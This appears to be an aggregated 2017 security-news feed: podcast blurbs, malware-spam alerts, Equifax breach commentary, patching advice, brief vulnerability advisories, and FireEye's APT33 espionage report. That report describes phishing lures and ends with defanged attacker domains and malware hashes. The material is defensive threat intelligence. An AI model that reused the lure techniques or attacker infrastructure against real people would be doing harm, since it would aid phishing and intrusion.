Enterprise Security Weekly #62 – Heat Death of the Universe

Paul and John discuss insights into the Equifax data breach. In the news, CyberGRX and BitSight join forces, YARA rules explained, Riverbed teases an application networking offering, and more on this episode of Enterprise Security Weekly!Full Show Notes: https://wiki.securityweekly.com/ES_Episode62

Visit https://www.securityweekly.com/esw for all the latest episodes!

Malware spam: "Invoice RE-2017-09-21-00xxx" from "Amazon Marketplace"

This fake Amazon spam comes with a malicious attachment: Subject:       Invoice RE-2017-09-21-00794 From:       "Amazon Marketplace" [yAhbPDAoufvZE@marketplace.amazon.co.uk] Date:       Thu, September 21, 2017 9:21 am Priority:       Normal ------------- Begin message ------------- Dear customer, We want to use this opportunity to first say "Thank you very much for your purchase!"

“Everyday” DDoS Attacks Must Be Mitigated

At last week’s CLOUDSEC 2017 conference, Corero CEO Ashley Stephenson spoke to attendees about the importance of mitigating the “everyday” small-scale distributed denial of service (DDoS) attacks that are pervasive and harmful to global businesses. Although massive volumetric attacks continue to make headline news, and such attacks are likely to get even more massive in scale, it is the short, frequent, low-threshold DDoS attacks that commonly affect businesses.

In our recent 2017 DDoS trends report, Corero found that fully 80% of DDoS attacks among our customers are less than 1Gbps in size, and 71% of attacks last less than 10 minutes. Simultaneously, we found that slightly larger (not massive, however) attacks in the realm of 10Gbps comprised only 1.7% of all attacks.

Small Scale DDoS Attacks Are Cause For Concern

The prevalence of low-threshold, sub-saturating attacks should warrant just as much concern as volumetric attacks. After all, it is not as if hackers cannot launch large-scale attacks, but rather that they choose to launch smaller attacks because smaller attacks often go undetected, and often serve as a smokescreen for more damaging cyberattacks. A small DDoS attack can take down a company’s firewall in a matter of seconds, thus enabling the hacker to infiltrate and map a company’s network, possibly installing malware. Even if the hacker does not infiltrate the network, the DDoS traffic creates “noise” on the network, thus degrading service and performance. For Internet service providers and hosting providers this is a major concern, because the sub-saturating attacks steal bandwidth; any DDoS traffic traversing their network is costly in terms of their network infrastructure resources and maintenance.

The Bottom Line

Small attacks are usually unnoticed—and therefore, not blocked—by cloud-based DDoS scrubbing solutions. If the IT security staff does notice a small attack, it takes several minutes to swing the traffic out to a scrubbing service. In contrast, Corero’s automated DDoS protection solution detects such low-threshold attacks immediately, and blocks them in less than 1 second.

Click here to view Stephenson’s slide presentation from CLOUDSEC 2017.

Corero has been a leader in DDoS protection for several years. Contact us to learn more about how we can protect your business.

Encryption would NOT have saved Equifax

I read a few articles this week suggesting that the big question for Equifax is whether or not their data was encrypted. The State of Massachusetts, speaking about the lawsuit it filed, said that Equifax "didn't put in safeguards like encryption that would have protected the data." Unfortunately, encryption, as it's most often used in these scenarios, would not have actually prevented the exposure of this data. This breach will have an enormous impact, so we should be careful to get the facts right and provide as much education as possible to law makers and really to anyone else affected.

We know that the attack took advantage of a flaw in Apache Struts (that should have been patched). Struts is a framework for building applications. It lives at the application tier. The data, obviously, resides at the data tier. Once the application was compromised, it really doesn't matter if the data was encrypted because the application is allowed to access (and therefore to decrypt) the data.

I won't get into all the various encryption techniques that are possible but there are two common types of data encryption for these types of applications. There's encryption of data in motion so that nobody can eavesdrop on the conversation as data moves between tiers or travels to the end users. And there's encryption of data at rest that protects data as it's stored on disk so that nobody can pick up the physical disk (or the data file, depending on how the encryption is applied) and access the data. Once the application is authenticated against the database and runs a query against the data, it is able to access, view, and act upon the data even if the data was encrypted while at rest.

Note that there is a commonly-applied technique that applies at-rest encryption at the application tier. I don't want to confuse the conversation with too much detail, but it usually involves inserting some code into the application to encrypt/decrypt. I suspect that if the application is compromised then app-tier encryption would have been equally unhelpful.

The bottom line here is that information security requires a broad, layered defense strategy. There are numerous types of attacks. A strong security program addresses as many potential attack vectors as possible within reason. (My use of "within reason" is a whole other conversation. Security strategies should evaluate risk in terms of likelihood of an attack and the damage that could be caused.) I already wrote about a layered approach to data protection within the database tier. But that same approach of layering security applies to application security (and information security in general). You have to govern the access controls, ensure strong enough authentication, understand user context, identify anomalous behavior, encrypt data, and, of course, patch your software and maintain your infrastructure. This isn't a scientific analysis. I'm just saying that encryption isn't a panacea and probably wouldn't have helped at all in this case.

Equifax says that their "security organization was aware of this vulnerability at that time, and took efforts to identify and to patch any vulnerable systems in the company's IT infrastructure." Clearly, humans need to rely on technology to help identify what systems exist in the environment, what software is installed, which versions, etc. I have no idea what tools Equifax might have used to scan their environment. Maybe the tool failed to find this install. But their use of "at that time" bothers me too. We can't rely on point-in-time assessments. We need continuous evaluations on a never ending cycle. We need better intelligence around our IT infrastructures. And as more workloads move to cloud, we need a unified approach to IT configuration compliance that works across company data centers and multi-cloud environments.

100% protection may be impossible. The best we can do is weigh the risks and apply as much security as possible to mitigate those risks. We should also all be moving to a continuous compliance model where we are actively assessing and reassessing security in real time. And again... layer, layer, layer.

Science of CyberSecurity: Where to get CyberSecurity Science

As part of a profile interview for Science of Cybersecurity I was asked five questions on cyber security last week, here's question 3 of 5.

Q. Where do you go to find your “science” of cybersecurity?
While cyber security controls appear simple to follow in policy statements and best practice guides, the reality is they are not always easy to implement across diverse organisations. When attempting to resolve complex security problems it can be easy for security professionals to lose sight of the goal of cyber security. To keep clarity, I think it helps to strips away the technology from the problem, and learn the security science and lessons from history.  So reading military strategy books like Sun Tzu’s “The Art of War” can improve how you think about and assess the cyber adversaries facing the organisation. Delving into the science of psychology is invaluable when seeking to bring about effective and positive staff security awareness and behavioural changes in the workplace.

Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware

When discussing suspected Middle Eastern hacker groups with destructive capabilities, many automatically think of the suspected Iranian group that previously used SHAMOON – aka Disttrack – to target organizations in the Persian Gulf. However, over the past few years, we have been tracking a separate, less widely known suspected Iranian group with potential destructive capabilities, whom we call APT33. Our analysis reveals that APT33 is a capable group that has carried out cyber espionage operations since at least 2013. We assess APT33 works at the behest of the Iranian government.

Recent investigations by FireEye’s Mandiant incident response consultants combined with FireEye iSIGHT Threat Intelligence analysis have given us a more complete picture of APT33’s operations, capabilities, and potential motivations. This blog highlights some of our analysis. Our detailed report on FireEye MySIGHT contains a more thorough review of our supporting evidence and analysis. We will also be discussing this threat group further during our webinar on Sept. 21 at 8 a.m. ET.

Targeting

APT33 has targeted organizations – spanning multiple industries – headquartered in the United States, Saudi Arabia and South Korea. APT33 has shown particular interest in organizations in the aviation sector involved in both military and commercial capacities, as well as organizations in the energy sector with ties to petrochemical production.

From mid-2016 through early 2017, APT33 compromised a U.S. organization in the aerospace sector and targeted a business conglomerate located in Saudi Arabia with aviation holdings.

During the same time period, APT33 also targeted a South Korean company involved in oil refining and petrochemicals. More recently, in May 2017, APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company.

We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia’s military aviation capabilities to enhance Iran’s domestic aviation capabilities or to support Iran’s military and strategic decision making vis a vis Saudi Arabia.

We believe the targeting of the Saudi organization may have been an attempt to gain insight into regional rivals, while the targeting of South Korean companies may be due to South Korea’s recent partnerships with Iran’s petrochemical industry as well as South Korea’s relationships with Saudi petrochemical companies. Iran has expressed interest in growing their petrochemical industry and often posited this expansion in competition to Saudi petrochemical companies. APT33 may have targeted these organizations as a result of Iran’s desire to expand its own petrochemical production and improve its competitiveness within the region. 

The generalized targeting of organizations involved in energy and petrochemicals mirrors previously observed targeting by other suspected Iranian threat groups, indicating a common interest in the sectors across Iranian actors.

Figure 1 shows the global scope of APT33 targeting.


Figure 1: Scope of APT33 Targeting

Spear Phishing

APT33 sent spear phishing emails to employees whose jobs related to the aviation industry. These emails included recruitment themed lures and contained links to malicious HTML application (.hta) files. The .hta files contained job descriptions and links to legitimate job postings on popular employment websites that would be relevant to the targeted individuals.

An example .hta file excerpt is provided in Figure 2. To the user, the file would appear as benign references to legitimate job postings; however, unbeknownst to the user, the .hta file also contained embedded code that automatically downloaded a custom APT33 backdoor.


Figure 2: Excerpt of an APT33 malicious .hta file

We assess APT33 used a built-in phishing module within the publicly available ALFA TEaM Shell (aka ALFASHELL) to send hundreds of spear phishing emails to targeted individuals in 2016. Many of the phishing emails appeared legitimate – they referenced a specific job opportunity and salary, provided a link to the spoofed company’s employment website, and even included the spoofed company’s Equal Opportunity hiring statement. However, in a few cases, APT33 operators left in the default values of the shell’s phishing module. These appear to be mistakes, as minutes after sending the emails with the default values, APT33 sent emails to the same recipients with the default values removed.

As shown in Figure 3, the “fake mail” phishing module in the ALFA Shell contains default values, including the sender email address (solevisible@gmail[.]com), subject line (“your site hacked by me”), and email body (“Hi Dear Admin”).


Figure 3: ALFA TEaM Shell v2-Fake Mail (Default)

Figure 4 shows an example email containing the default values the shell.


Figure 4: Example Email Generated by the ALFA Shell with Default Values

Domain Masquerading

APT33 registered multiple domains that masquerade as Saudi Arabian aviation companies and Western organizations that together have partnerships to provide training, maintenance and support for Saudi’s military and commercial fleet. Based on observed targeting patterns, APT33 likely used these domains in spear phishing emails to target victim organizations.    

The following domains masquerade as these organizations: Boeing, Alsalam Aircraft Company, Northrop Grumman Aviation Arabia (NGAAKSA), and Vinnell Arabia.

boeing.servehttp[.]com

alsalam.ddns[.]net

ngaaksa.ddns[.]net

ngaaksa.sytes[.]net

vinnellarabia.myftp[.]org

Boeing, Alsalam Aircraft company, and Saudia Aerospace Engineering Industries entered into a joint venture to create the Saudi Rotorcraft Support Center in Saudi Arabia in 2015 with the goal of servicing Saudi Arabia’s rotorcraft fleet and building a self-sustaining workforce in the Saudi aerospace supply base.

Alsalam Aircraft Company also offers military and commercial maintenance, technical support, and interior design and refurbishment services.

Two of the domains appeared to mimic Northrop Grumman joint ventures. These joint ventures – Vinnell Arabia and Northrop Grumman Aviation Arabia – provide aviation support in the Middle East, specifically in Saudi Arabia. Both Vinnell Arabia and Northrop Grumman Aviation Arabia have been involved in contracts to train Saudi Arabia’s Ministry of National Guard.

Identified Persona Linked to Iranian Government

We identified APT33 malware tied to an Iranian persona who may have been employed by the Iranian government to conduct cyber threat activity against its adversaries.

We assess an actor using the handle “xman_1365_x” may have been involved in the development and potential use of APT33’s TURNEDUP backdoor due to the inclusion of the handle in the processing-debugging (PDB) paths of many of TURNEDUP samples. An example can be seen in Figure 5.


Figure 5: “xman_1365_x" PDB String in TURNEDUP Sample

Xman_1365_x was also a community manager in the Barnamenevis Iranian programming and software engineering forum, and registered accounts in the well-known Iranian Shabgard and Ashiyane forums, though we did not find evidence to suggest that this actor was ever a formal member of the Shabgard or Ashiyane hacktivist groups.

Open source reporting links the “xman_1365_x” actor to the “Nasr Institute,” which is purported to be equivalent to Iran’s “cyber army” and controlled by the Iranian government. Separately, additional evidence ties the “Nasr Institute” to the 2011-2013 attacks on the financial industry, a series of denial of service attacks dubbed Operation Ababil. In March 2016, the U.S. Department of Justice unsealed an indictment that named two individuals allegedly hired by the Iranian government to build attack infrastructure and conduct distributed denial of service attacks in support of Operation Ababil. While the individuals and the activity described in indictment are different than what is discussed in this report, it provides some evidence that individuals associated with the “Nasr Institute” may have ties to the Iranian government.

Potential Ties to Destructive Capabilities and Comparisons with SHAMOON

One of the droppers used by APT33, which we refer to as DROPSHOT, has been linked to the wiper malware SHAPESHIFT. Open source research indicates SHAPESHIFT may have been used to target organizations in Saudi Arabia.

Although we have only directly observed APT33 use DROPSHOT to deliver the TURNEDUP backdoor, we have identified multiple DROPSHOT samples in the wild that drop SHAPESHIFT. The SHAPESHIFT malware is capable of wiping disks, erasing volumes and deleting files, depending on its configuration. Both DROPSHOT and SHAPESHIFT contain Farsi language artifacts, which indicates they may have been developed by a Farsi language speaker (Farsi is the predominant and official language of Iran).

While we have not directly observed APT33 use SHAPESHIFT or otherwise carry out destructive operations, APT33 is the only group that we have observed use the DROPSHOT dropper. It is possible that DROPSHOT may be shared amongst Iran-based threat groups, but we do not have any evidence that this is the case.

In March 2017, Kasperksy released a report that compared DROPSHOT (which they call Stonedrill) with the most recent variant of SHAMOON (referred to as Shamoon 2.0). They stated that both wipers employ anti-emulation techniques and were used to target organizations in Saudi Arabia, but also mentioned several differences. For example, they stated DROPSHOT uses more advanced anti-emulation techniques, utilizes external scripts for self-deletion, and uses memory injection versus external drivers for deployment. Kaspersky also noted the difference in resource language sections: SHAMOON embeds Arabic-Yemen language resources while DROPSHOT embeds Farsi (Persian) language resources.

We have also observed differences in both targeting and tactics, techniques and procedures (TTPs) associated with the group using SHAMOON and APT33. For example, we have observed SHAMOON being used to target government organizations in the Middle East, whereas APT33 has targeted several commercial organizations both in the Middle East and globally. APT33 has also utilized a wide range of custom and publicly available tools during their operations. In contrast, we have not observed the full lifecycle of operations associated with SHAMOON, in part due to the wiper removing artifacts of the earlier stages of the attack lifecycle.

Regardless of whether DROPSHOT is exclusive to APT33, both the malware and the threat activity appear to be distinct from the group using SHAMOON. Therefore, we assess there may be multiple Iran-based threat groups capable of carrying out destructive operations.

Additional Ties Bolster Attribution to Iran

APT33’s targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests, implying that the threat actor is most likely government sponsored. This coupled with the timing of operations – which coincides with Iranian working hours – and the use of multiple Iranian hacker tools and name servers bolsters our assessment that APT33 may have operated on behalf of the Iranian government.

The times of day that APT33 threat actors were active suggests that they were operating in a time zone close to 04:30 hours ahead of Coordinated Universal Time (UTC). The time of the observed attacker activity coincides with Iran’s Daylight Time, which is +0430 UTC.

APT33 largely operated on days that correspond to Iran’s workweek, Saturday to Wednesday. This is evident by the lack of attacker activity on Thursday, as shown in Figure 6. Public sources report that Iran works a Saturday to Wednesday or Saturday to Thursday work week, with government offices closed on Thursday and some private businesses operating on a half day schedule on Thursday. Many other Middle East countries have elected to have a Friday and Saturday weekend. Iran is one of few countries that subscribes to a Saturday to Wednesday workweek.

APT33 leverages popular Iranian hacker tools and DNS servers used by other suspected Iranian threat groups. The publicly available backdoors and tools utilized by APT33 – including NANOCORE, NETWIRE, and ALFA Shell – are all available on Iranian hacking websites, associated with Iranian hackers, and used by other suspected Iranian threat groups. While not conclusive by itself, the use of publicly available Iranian hacking tools and popular Iranian hosting companies may be a result of APT33’s familiarity with them and lends support to the assessment that APT33 may be based in Iran.


Figure 6: APT33 Interactive Commands by Day of Week

Outlook and Implications

Based on observed targeting, we believe APT33 engages in strategic espionage by targeting geographically diverse organizations across multiple industries. Specifically, the targeting of organizations in the aerospace and energy sectors indicates that the threat group is likely in search of strategic intelligence capable of benefitting a government or military sponsor. APT33’s focus on aviation may indicate the group’s desire to gain insight into regional military aviation capabilities to enhance Iran’s aviation capabilities or to support Iran’s military and strategic decision making. Their targeting of multiple holding companies and organizations in the energy sectors align with Iranian national priorities for growth, especially as it relates to increasing petrochemical production. We expect APT33 activity will continue to cover a broad scope of targeted entities, and may spread into other regions and sectors as Iranian interests dictate.

APT33’s use of multiple custom backdoors suggests that they have access to some of their own development resources, with which they can support their operations, while also making use of publicly available tools. The ties to SHAPESHIFT may suggest that APT33 engages in destructive operations or that they share tools or a developer with another Iran-based threat group that conducts destructive operations.

Appendix

Malware Family Descriptions

Malware Family

Description

Availability

DROPSHOT

Dropper that has been observed dropping and launching the TURNEDUP backdoor, as well as the SHAPESHIFT wiper malware

Non-Public

NANOCORE

Publicly available remote access Trojan (RAT) available for purchase. It is a full-featured backdoor with a plugin framework

Public

NETWIRE

Backdoor that attempts to steal credentials from the local machine from a variety of sources and supports other standard backdoor features.

Public

TURNEDUP

Backdoor capable of uploading and downloading files, creating a reverse shell, taking screenshots, and gathering system information

Non-Public

Indicators of Compromise

APT33 Domains Likely Used in Initial Targeting

Domain

boeing.servehttp[.]com

alsalam.ddns[.]net

ngaaksa.ddns[.]net

ngaaksa.sytes[.]net

vinnellarabia.myftp[.]org

APT33 Domains / IPs Used for C2

C2 Domain

MALWARE

managehelpdesk[.]com

NANOCORE

microsoftupdated[.]com

NANOCORE

osupd[.]com

NANOCORE

mywinnetwork.ddns[.]net

NETWIRE

www.chromup[.]com

TURNEDUP

www.securityupdated[.]com

TURNEDUP

googlmail[.]net

TURNEDUP

microsoftupdated[.]net

TURNEDUP

syn.broadcaster[.]rocks

TURNEDUP

www.googlmail[.]net

TURNEDUP

Publicly Available Tools used by APT33

MD5

MALWARE

Compile Time (UTC)

3f5329cf2a829f8840ba6a903f17a1bf

NANOCORE

2017/1/11 2:20

10f58774cd52f71cd4438547c39b1aa7

NANOCORE

2016/3/9 23:48

663c18cfcedd90a3c91a09478f1e91bc

NETWIRE

2016/6/29 13:44

6f1d5c57b3b415edc3767b079999dd50

NETWIRE

2016/5/29 14:11

Unattributed DROPSHOT / SHAPESHIFT MD5 Hashes

MD5

MALWARE

Compile Time (UTC)

0ccc9ec82f1d44c243329014b82d3125

DROPSHOT

(drops SHAPESHIFT

n/a - timestomped

fb21f3cea1aa051ba2a45e75d46b98b8

DROPSHOT

n/a - timestomped

3e8a4d654d5baa99f8913d8e2bd8a184

SHAPESHIFT

2016/11/14 21:16:40

6b41980aa6966dda6c3f68aeeb9ae2e0

SHAPESHIFT

2016/11/14 21:16:40

APT33 Malware MD5 Hashes

MD5

MALWARE

Compile Time (UTC)

8e67f4c98754a2373a49eaf53425d79a

DROPSHOT (drops TURNEDUP)

2016/10/19 14:26

c57c5529d91cffef3ec8dadf61c5ffb2

TURNEDUP

2014/6/1 11:01

c02689449a4ce73ec79a52595ab590f6

TURNEDUP

2016/9/18 10:50

59d0d27360c9534d55596891049eb3ef

TURNEDUP

2016/3/8 12:34

59d0d27360c9534d55596891049eb3ef

TURNEDUP

2016/3/8 12:34

797bc06d3e0f5891591b68885d99b4e1

TURNEDUP

2015/3/12 5:59

8e6d5ef3f6912a7c49f8eb6a71e18ee2

TURNEDUP

2015/3/12 5:59

32a9a9aa9a81be6186937b99e04ad4be

TURNEDUP

2015/3/12 5:59

a272326cb5f0b73eb9a42c9e629a0fd8

TURNEDUP

2015/3/9 16:56

a813dd6b81db331f10efaf1173f1da5d

TURNEDUP

2015/3/9 16:56

de9e3b4124292b4fba0c5284155fa317

TURNEDUP

2015/3/9 16:56

a272326cb5f0b73eb9a42c9e629a0fd8

TURNEDUP

2015/3/9 16:56

b3d73364995815d78f6d66101e718837

TURNEDUP

2014/6/1 11:01

de7a44518d67b13cda535474ffedf36b

TURNEDUP

2014/6/1 11:01

b5f69841bf4e0e96a99aa811b52d0e90

TURNEDUP

2014/6/1 11:01

a2af2e6bbb6551ddf09f0a7204b5952e

TURNEDUP

2014/6/1 11:01

b189b21aafd206625e6c4e4a42c8ba76

TURNEDUP

2014/6/1 11:01

aa63b16b6bf326dd3b4e82ffad4c1338

TURNEDUP

2014/6/1 11:01

c55b002ae9db4dbb2992f7ef0fbc86cb

TURNEDUP

2014/6/1 11:01

c2d472bdb8b98ed83cc8ded68a79c425

TURNEDUP

2014/6/1 11:01

c6f2f502ad268248d6c0087a2538cad0

TURNEDUP

2014/6/1 11:01

c66422d3a9ebe5f323d29a7be76bc57a

TURNEDUP

2014/6/1 11:01

ae47d53fe8ced620e9969cea58e87d9a

TURNEDUP

2014/6/1 11:01

b12faab84e2140dfa5852411c91a3474

TURNEDUP

2014/6/1 11:01

c2fbb3ac76b0839e0a744ad8bdddba0e

TURNEDUP

2014/6/1 11:01

a80c7ce33769ada7b4d56733d02afbe5

TURNEDUP

2014/6/1 11:01

6a0f07e322d3b7bc88e2468f9e4b861b

TURNEDUP

2014/6/1 11:01

b681aa600be5e3ca550d4ff4c884dc3d

TURNEDUP

2014/6/1 11:01

ae870c46f3b8f44e576ffa1528c3ea37

TURNEDUP

2014/6/1 11:01

bbdd6bb2e8827e64cd1a440e05c0d537

TURNEDUP

2014/6/1 11:01

0753857710dcf96b950e07df9cdf7911

TURNEDUP

2013/4/10 10:43

d01781f1246fd1b64e09170bd6600fe1

TURNEDUP

2013/4/10 10:43

1381148d543c0de493b13ba8ca17c14f

TURNEDUP

2013/4/10 10:43

Telaxus Epesi 1.8.1.1 arbitrary Execute Code Cross Site Scripting Vulnerability

Multiple Cross-Site Scripting (XSS) issues were discovered in EPESI 1.8.1.1. The vulnerabilities exist due to insufficient filtration of user-supplied data (cid, value, element, mode, tab, form_name, id) passed to the EPESI-master/modules/Utils/RecordBrowser/grid.php URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website..

Hack Naked News #141 – September 18, 2017

CCleaner is distributing malware, rogue WordPress plugins, Equifax replaces key staff members, and more. Jason Wood of Paladin Security discusses malicious WordPress plugins on this episode of Hack Naked News!Full Show Notes: https://wiki.securityweekly.com/HNNEpisode141

Visit http://hacknaked.tv for all the latest episodes!

Science of CyberSecurity: Reasons Behind Most Security Breaches

As part of a profile interview for Science of Cybersecurity I was asked five questions on cyber security last week, here's question 2 of 5.

Q. What – in your estimation – are the reasons behind the many computer security breaches/failures that we see today?
Simply put insecure IT systems and people are behind every breach, insecure IT systems are arguably caused by people as well, whether it is poor system management, lack of security design, insecure coding techniques, and or inadequate support, it all boils down to someone not doing security right. For many years seasoned security experts have advocated that people are the weakest link in security, even hackers say ‘amateurs hack systems, professionals hack people’, yet many organisations still focus most of their resources and funds heavily on securing IT systems over providing staff with sustained security awareness. Maybe this is a result of an IT security sales industry over hyping the effectiveness of technical security solutions. I think most organisations can do more to address this balance, starting with better understanding the awareness level and risk posed by their employees. For instance, the security awareness of staff can be measured by using a fake phishing campaign to detect how many staff would click on a link within a suspicious email. While analysing the root causes of past cyber security incidents is a highly valuable barometer in understanding the risk posed by staff, all can be used as inputs into the cyber risk assessment process.

A developer’s guide to complying with PCI DSS 3.2 Requirement 6 Article

My updated article on "A developer's guide to complying with PCI DSS 3.2 Requirement 6" was released on the IBM Developer Works website today.

This article provides guidance on
 PCI DSS requirement 6, which breaks down into 28 further individual requirements and sits squarely with software developers who are involved in the development of applications that process, store, and transmit cardholder data.

Heads up: Malware found in Piriform’s CCleaner installer

If you installed the free version of CCleaner after Aug. 15, a couple of nasty programs came along for the ride. Talos Intelligence, a division of Cisco, just published a damning account of malware that it found hiding in the installer for CCleaner 5.33, the version that was released on Aug. 15 and which, according to Talos, was still the primary download on the official CCleaner page on Sept. 11.

After notifying Piriform, CCleaner was, ahem, cleaned up and version 5.34 appeared on Sept. 12.

I just checked, and the current version available from Piriform is version 5.34. (Piriform was bought by antivirus giant Avast in July.)

To read this article in full, please click here

I know I haven’t patched yet, and there’s a zero-day knocking at my door

I know I haven't patched yet, and there's a zero-day knocking at my door

Patching is important, but let's agree it takes time. It takes time to test & validate the patch in your environment, check the application compatibility with the software and the underlying services. And then, one fine day, an adversary just hacks your server due to this un-patched code while you are testing it. It breaks my heart and I wonder "what can be done in the delta period while the team is testing the patch"? Adversary on the other hand is busy either reversing the patch, or using a zero-day to attack the systems! I mean once a patch is released it's a race,

Either bad guys reverse it and release a working exploit, OR good guys test, verify and update their environment. A close game, always.

Technically, I wouldn't blame the application security team, or the one managing the vulnerable server. They have their SLA to apply updates on the OS or Application Servers. In my experience, a high severity patch has to be applied in 15 days, medium in 30 days, and low in 45 days. Now, if the criticality is too severe; it can should be managed in 24 to 48 hours with enough testing on functionality, compatibility, and test cases with application team; or server management team. Now, what to do when there is a zero-day exploit lurking in your backyard? It used to be a low-probability gamble, but now it's getting more realistic and frequent. The recent case of Apache Struts vulnerability has done enough damage for many big companies like Equifax. I already addressed this issue in a blog-post before, and the need for alternatives such as WAF in Secure SDLC.

What shall I do if there's a 0-day lurking in my backyard?

Yes, I know there's a zero day for your web-application or underlying server, and you are busy patching but what other security controls do you have in place?
Ask yourself these questions,

  1. Do I have understanding of the zero-day exploit? Is it affecting my application, or a particular feature?
  2. Do I have a product/ tool for prevention at the application layer for network perimeter that can filter bad requests - Network WAF (Web Application Firewall), Network IPS (Intrusion Prevention System) etc.?
  3. Do I have a product/ tool for prevention at the application layer for host - Host based IPS, WAF etc.
  4. Can I just take the application offline, while I patch?
  5. What's the threat model and risk appetite if the exploitation is successful?
  6. Can I brace for impact by lowering the interaction with other components, or by preventing it to spread across my environment?

Let's understand how these answers will support your planning to develop a resilient environment,

>> Understanding of the zero-day exploit

You know there's an exploit in the wild; but does your security team or devops guys take a look at it? Did they find the exploit and understood the impact on your application? It is very important to understand what are you dealing with before you plan to secure your environment. Not all exploits are in scope of your environment due to the limitations, frameworks, plugins etc. So, do research a bit, ask questions and accordingly work on your timelines. Best case, understand the pattern you have to protect your application from.

>> Prevention at the application layer for network perimeter

If you know what's coming to hit you, you can plan a strategy to block it as well. Blocking is more effective when it's at the perimeter - earlier the better. And, if you have done good research on the exploit, or the threat-vector that can affect you; please take a note of the pattern and find a way to block it at the perimeter while you patch the application.

>> Prevention at the application layer for host

There are sometimes even when you know the pattern, and the details on the exploit but still network perimeter is incapable of blocking it. Example, if the SSL offload is on the server/ load balancer. In this case make sure the server knows what is expected; blocks everything else including an anomaly. This can be achieved by Host based protection: IPS, or WAF.
Even a small thing like tripwire can monitor the directory, and files to make sure attacker is either not able to create files; or you get the alert at the right time to react. This can make a huge difference!

Note: Make sure the IPS (network/ host) is capable of in-depth packet filtering. If the pattern can be blocked on the WAF with a quick rule, do it and make sure it doesn't generate false positives which can impact your business. Also, do monitor the WAF for alerts which can tell you if there have been failed attempts by the adversaries. Remember, the attackers won't directly use their best weapon; usually it starts with "information gathering", or uploading files, or executing known exploits before customizing the case for their needs.

You have very high chances to detect adversaries while they are gathering insights about you. Keep a keen eye on any alert from production environment.

>> Taking application offline

Is it possible to take the offline while you patch the software? This depends on the fact what's the exposure of the application, what is the kind of CIA (Confidentiality, Integrity and Availability) rating and what kind of business impact assessment has been performed. If you think that taking it offline can speed up the process, and also reduce the exposure without hurting your business; do it. Better safe than sorry.

>> Threat model and risk appetite

You have to assess & perform threat modeling of the application. The reason it is required is not every risk is high. Not every application needs the same attention, and the vulnerable application may well be internal that will substantially reduce the exposure and underlying impact! Do ask your team - is the application Internet facing, how many users are using it, what kind of data is it dealing with etc. and act accordingly.

>> Brace for impact

Finally, if things still look blurred, start prepping yourself for impact. Try to minimize it by validating and restricting the access to the server. You can perform some sanity checks, and implement controls like,

  1. Least privilege accounts for application use
  2. Least interaction with the rest of production environment
  3. Restricted database requests and response to limit the data ex-filtration
  4. Keep the incident management team on high-alert.
Incident management - Are you sure you are not already breached?

Now, what are the odds that while you reading this blog, trying to answer all the questions and getting ready - you haven't already been compromised? Earlier such statement of incidents used to begin with "What if..." but now it says "When..." so, yeah make sure all your monitoring systems are reporting the anomalies and someone is monitoring it well. These tools are only good if some human being is responsibly validating the alerts. Once an alert is flagged red; a process should trigger to analyze and minimize the impact.
Read more about incident monitoring failures in my earlier blogpost. Don't be one of them.

Now, once you address these questions you must have a fairly resilient environment to either mitigate or absorb the impact. Be safe!

5 Ways to Secure Wi-Fi Networks

Wi-Fi is one entry-point hackers can use to get into your network without setting foot inside your building because wireless is much more open to eavesdroppers than wired networks, which means you have to be more diligent about security.

But there’s a lot more to Wi-Fi security than just setting a simple password. Investing time in learning about and applying enhanced security measures can go a long way toward better protecting your network. Here are six tips to betters secure your Wi-Fi network.

Use an inconspicuous network name (SSID)

The service set identifier (SSID) is one of the most basic Wi-Fi network settings. Though it doesn’t seem like the network name could compromise security, it certainly can. Using a too common of a SSID, like “wireless” or the vendor’s default name, can make it easier for someone to crack the personal mode of WPA or WPA2 security. This is because the encryption algorithm incorporates the SSID, and password cracking dictionaries used by hackers are preloaded with common and default SSIDs. Using one of those just makes the hacker’s job easier.

To read this article in full, please click here

Malware spam: "Status of invoice" with .7z attachment

This spam leads to Locky ransomware: Subject:       Status of invoice From:       "Rosella Setter" ordering@[redacted] Date:       Mon, September 18, 2017 9:30 am Hello, Could you please let me know the status of the attached invoice? I appreciate your help! Best regards, Rosella Setter Tel: 206-575-8068 x 100 Fax: 206-575-8094 *NEW*   Ordering@[redacted].com * Kindly note we will be

Startup Security Weekly #55 – Bald, Beautiful Men

Jason Brvenik of NSS Labs joins us. In the news, attributes of a scalable business, founder struggles, how to grow your startup, and updates from AppGuard, Securonix, CashShield, and more on this episode of Startup Security Weekly!Full Show Notes: https://wiki.securityweekly.com/SSWEpisode55Visit https://www.securityweekly.com/ssw for all the latest episodes!

Pagekit 1.0.10 Remote Code Execution Vulnerability

An issue was discovered in Pagekit CMS before 1.0.11. In this vulnerability the remote attacker is able to reset the registered user's password, when the debug toolbar is enabled. The password is successfully recovered using this exploit. The SecureLayer7 ID is SL7_PGKT_01.

Science of CyberSecurity: Thoughts on the current state of Cyber Security

As part of a profile interview for Science of Cybersecurity I was asked five questions on cyber security last week, here's question 1 of 5.


Q. What are your thoughts on the current state of cybersecurity, both for organizations and for consumers?
Thanks to regular sensational media hacking headlines most organisational leaders are worried about their organisation’s cyber security posture, but they often lack the appropriate expert support in helping them properly understand their organisation’s cyber risk. To address the cyber security concern, an ‘off the peg’ industry best practice check box approach is often resorted to. However, this one-size-fits-all strategy is far from cost effective and only provides limited assurance in protecting against modern cyber attacks, given every organisation is unique, and cyber threat adversaries continually evolve their tactics and methodologies. In these difficult financial times of limiting cyber security budgets, it is important for the cyber security effort to be prioritised and targeted. To achieve this, the cyber security strategy should be born out of threat intelligence, threat assessing and a cyber risk assessment. This provides organisational leaders with the information to take effective cyber security strategy decisions, and to allocate funding and resources based on a subject matter they do understand well, business risk. Nothing can ever be 100% safeguarded; cyber security is and always should be a continual risk based undertaking, and requires an organisation risk tailored cyber security strategy, which is properly understood and led from the very top of the organisation. This is what it takes to stay ahead in the cyber security game.

VirusTotal += Avast Mobile Security

We welcome the Avast Mobile Security scanner to VirusTotal. This engine is specialized in Android and reinforces the participation of Avast that already had a multi-platform scanner in our service. In the words of the company:

